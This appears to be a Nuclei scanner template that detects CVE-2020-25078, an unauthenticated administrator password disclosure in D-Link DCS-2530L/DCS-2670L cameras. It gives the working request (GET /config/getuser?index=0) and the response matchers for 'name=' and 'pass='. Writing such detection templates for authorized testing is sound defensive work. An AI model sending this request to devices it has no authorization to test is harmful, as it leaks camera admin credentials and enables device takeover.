id: CVE-2020-25078 info: name: D-Link DCS-2530L/DCS-2670L - Administrator Password Disclosure author: pikpikcu severity: high description: D-Link DCS-2530L before 1.06.01 Hotfix and DCS-2670L through 2.02 devices are vulnerable to password disclosures vulnerabilities because the /config/getuser endpoint allows for remote administrator password disclosure. reference: - https://supportannouncement.us.dlink.com/announcement/publication.aspx?name=SAP10180 - https://twitter.com/Dogonsecurity/status/1273251236167516161 - https://nvd.nist.gov/vuln/detail/CVE-2020-25078 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2020-25078 tags: cve,cve2020,dlink requests: - method: GET path: - "{{BaseURL}}/config/getuser?index=0" matchers-condition: and matchers: - type: word words: - "name=" - "pass=" condition: and - type: word words: - "text/plain" part: header - type: status status: - 200 # Enhanced by mp on 2022/07/15